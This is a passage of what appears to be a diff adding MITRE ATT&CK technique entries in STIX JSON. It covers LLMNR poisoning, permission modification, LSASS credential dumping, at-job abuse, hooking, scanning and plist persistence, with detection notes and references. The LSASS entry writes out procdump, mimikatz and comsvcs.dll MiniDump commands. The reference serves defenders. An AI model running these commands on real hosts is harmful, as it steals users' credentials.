[Responder](https://attack.mitre.org/software/S0174).(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_contributors": [ + "Eric Kuehn, Secure Ideas", + "Matthew Demaske, Adaptforward", + "Andrew Allen, @whitehat_zero" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--650c784b-7504-4df7-ab2c-4ea882384d1e", + "created": "2020-02-11T19:08:51.677Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1557/001", + "external_id": "T1557.001" + }, + { + "source_name": "Rapid7 LLMNR Spoofer", + "description": "Francois, R. (n.d.). LLMNR Spoofer. Retrieved November 17, 2017.", + "url": "https://www.rapid7.com/db/modules/auxiliary/spoof/llmnr/llmnr_response" + }, + { + "source_name": "GitHub Responder", + "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.", + "url": "https://github.com/SpiderLabs/Responder" + }, + { + "source_name": "Secure Ideas SMB Relay", + "description": "Kuehn, E. (2018, April 11). Ever Run a Relay? Why SMB Relays Should Be On Your Mind. Retrieved February 7, 2019.", + "url": "https://blog.secureideas.com/2018/04/ever-run-a-relay-why-smb-relays-should-be-on-your-mind.html" + }, + { + "source_name": "TechNet NetBIOS", + "description": "Microsoft. (n.d.). NetBIOS Name Resolution. Retrieved November 17, 2017.", + "url": "https://technet.microsoft.com/library/cc958811.aspx" + }, + { + "source_name": "GitHub NBNSpoof", + "description": "Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.", + "url": "https://github.com/nomex/nbnspoof" + }, + { + "source_name": "GitHub Conveigh", + "description": "Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.", + "url": "https://github.com/Kevin-Robertson/Conveigh" + }, + { + "source_name": "byt3bl33d3r NTLM Relaying", + "description": "Salvati, M. (2017, June 2). Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes). Retrieved February 7, 2019.", + "url": "https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html" + }, + { + "source_name": "Sternsecurity LLMNR-NBTNS", + "description": "Sternstein, J. (2013, November). Local Network Attacks: LLMNR and NBT-NS Poisoning. Retrieved November 17, 2017.", + "url": "https://www.sternsecurity.com/blog/local-network-attacks-llmnr-and-nbt-ns-poisoning" + }, + { + "source_name": "Wikipedia LLMNR", + "description": "Wikipedia. (2016, July 7). Link-Local Multicast Name Resolution. Retrieved November 17, 2017.", + "url": "https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "File and Directory Permissions Modification", + "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "CrowdStrike Falcon OverWatch", + "Jan Miller, CrowdStrike" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.\n\nConsider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "2.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "File system access controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1222", + "external_id": "T1222" + }, + { + "source_name": "falconoverwatch_blackcat_attack", + "description": "Falcon OverWatch Team. (2022, March 23). Falcon OverWatch Threat Hunting Contributes to Seamless Protection Against Novel BlackCat Attack. Retrieved May 5, 2022.", + "url": "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/" + }, + { + "source_name": "Hybrid Analysis Icacls1 June 2018", + "description": "Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018.", + "url": "https://www.hybrid-analysis.com/sample/ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4d?environmentId=100" + }, + { + "source_name": "Hybrid Analysis Icacls2 May 2018", + "description": "Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018.", + "url": "https://www.hybrid-analysis.com/sample/22dab012c3e20e3d9291bce14a2bfc448036d3b966c6e78167f4626f5f9e38d6?environmentId=110" + }, + { + "source_name": "bad_luck_blackcat", + "description": "Kaspersky Global Research & Analysis Team (GReAT). (2022). A Bad Luck BlackCat. Retrieved May 5, 2022.", + "url": "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf" + }, + { + "source_name": "fsutil_behavior", + "description": "Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior" + }, + { + "source_name": "EventTracker File Permissions Feb 2014", + "description": "Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.", + "url": "https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/" + }, + { + "source_name": "blackmatter_blackcat", + "description": "Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.", + "url": "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html" + }, + { + "source_name": "new_rust_based_ransomware", + "description": "Symantec Threat Hunter Team. (2021, December 16). Noberus: Technical Analysis Shows Sophistication of New Rust-based Ransomware. Retrieved January 14, 2022.", + "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-12-27T17:57:20.003Z", + "name": "LSASS Memory", + "description": "Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run using:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\nBuilt-in Windows tools such as `comsvcs.dll` can also be used:\n\n* rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\nSimilar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Edward Millington", + "Ed Williams, Trustwave, SpiderLabs", + "Olaf Hartong, Falcon Force" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.\n\nOn Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.\n\nMonitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90", + "created": "2020-02-11T18:41:44.783Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1003/001", + "external_id": "T1003.001" + }, + { + "source_name": "Medium Detecting Attempts to Steal Passwords from Memory", + "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea" + }, + { + "source_name": "Deep Instinct LSASS", + "description": "Gilboa, A. (2021, February 16). LSASS Memory Dumps are Stealthier than Ever Before - Part 2. Retrieved December 27, 2023.", + "url": "https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2" + }, + { + "source_name": "Graeber 2014", + "description": "Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.", + "url": "http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html" + }, + { + "source_name": "Volexity Exchange Marauder March 2021", + "description": "Gruzweig, J. et al. (2021, March 2). Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities. Retrieved March 3, 2021.", + "url": "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/" + }, + { + "source_name": "Powersploit", + "description": "PowerSploit. (n.d.). Retrieved December 4, 2014.", + "url": "https://github.com/mattifestation/PowerSploit" + }, + { + "source_name": "Symantec Attacks Against Government Sector", + "description": "Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.", + "url": "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf" + }, + { + "source_name": "TechNet Blogs Credential Protection", + "description": "Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.", + "url": "https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "At (Linux)", + "description": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\n\nAn adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\n\nAdversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_remote_support": true, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--6636bc83-0611-45a6-b74f-1f3daf635b8e", + "created": "2019-12-03T12:59:36.749Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1053/001", + "external_id": "T1053.001" + }, + { + "source_name": "rowland linux at 2019", + "description": "Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.", + "url": "https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/" + }, + { + "source_name": "GTFObins at", + "description": "Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.", + "url": "https://gtfobins.github.io/gtfobins/at/" + }, + { + "source_name": "Kifarunix - Task Scheduling in Linux", + "description": "Koromicha. (2019, September 7). Scheduling tasks using at command in Linux. Retrieved December 3, 2019.", + "url": "https://kifarunix.com/scheduling-tasks-using-at-command-in-linux/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Hooking", + "description": "Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. \n\nHooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Elastic Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Elastic Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Elastic Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.\n\nMalicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)\n\nHooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure. (Citation: Microsoft Hook Overview) (Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools (Citation: Volatility Detecting Hooks Sept 2012) (Citation: PreKageo Winhook Jul 2011) (Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures. (Citation: Zairon Hooking Dec 2006) (Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors (Citation: GMER Rootkits) can also be used to monitor for various flavors of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes (Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions. (Citation: StackExchange Hooks Jul 2012) (Citation: Adlice Software IAT Hooks Oct 2014)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1179", + "external_id": "T1179" + }, + { + "source_name": "Microsoft Hook Overview", + "description": "Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "Adlice Software IAT Hooks Oct 2014", + "description": "Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.", + "url": "https://www.adlice.com/userland-rootkits-part-1-iat-hooks/" + }, + { + "source_name": "MWRInfoSecurity Dynamic Hooking 2015", + "description": "Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User Mode. Retrieved December 20, 2017.", + "url": "https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/" + }, + { + "source_name": "HighTech Bridge Inline Hooking Sept 2011", + "description": "Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved December 12, 2017.", + "url": "https://www.exploit-db.com/docs/17802.pdf" + }, + { + "source_name": "Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017", + "description": "Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. Retrieved December 18, 2017.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918" + }, + { + "source_name": "Symantec Windows Rootkits", + "description": "Symantec. (n.d.). Windows Rootkit Overview. Retrieved December 21, 2017.", + "url": "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf" + }, + { + "source_name": "Volatility Detecting Hooks Sept 2012", + "description": "Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.", + "url": "https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html" + }, + { + "source_name": "PreKageo Winhook Jul 2011", + "description": "Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.", + "url": "https://github.com/prekageo/winhook" + }, + { + "source_name": "Jay GetHooks Sept 2011", + "description": "Satiro, J. (2011, September 14). GetHooks. Retrieved December 12, 2017.", + "url": "https://github.com/jay/gethooks" + }, + { + "source_name": "Zairon Hooking Dec 2006", + "description": "Felici, M. (2006, December 6). Any application-defined hook procedure on my machine?. Retrieved December 12, 2017.", + "url": "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/" + }, + { + "source_name": "EyeofRa Detecting Hooking June 2017", + "description": "Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense against user-land. Retrieved December 12, 2017.", + "url": "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/" + }, + { + "source_name": "GMER Rootkits", + "description": "GMER. (n.d.). GMER. Retrieved December 12, 2017.", + "url": "http://www.gmer.net/" + }, + { + "source_name": "Microsoft Process Snapshot", + "description": "Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved December 12, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx" + }, + { + "source_name": "StackExchange Hooks Jul 2012", + "description": "Stack Exchange - Security. (2012, July 31). What are the methods to find hooked functions and APIs?. Retrieved December 12, 2017.", + "url": "https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Active Scanning", + "description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b", + "created": "2020-10-02T16:53:16.526Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1595", + "external_id": "T1595" + }, + { + "source_name": "Botnet Scan", + "description": "Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from a Botnet. Retrieved October 20, 2020.", + "url": "https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf" + }, + { + "source_name": "OWASP Fingerprinting", + "description": "OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved October 20, 2020.", + "url": "https://wiki.owasp.org/index.php/OAT-004_Fingerprinting" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Plist Modification", + "description": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \n\nMonitor for plist file modification immediately followed by code execution from ~/Library/Scripts and 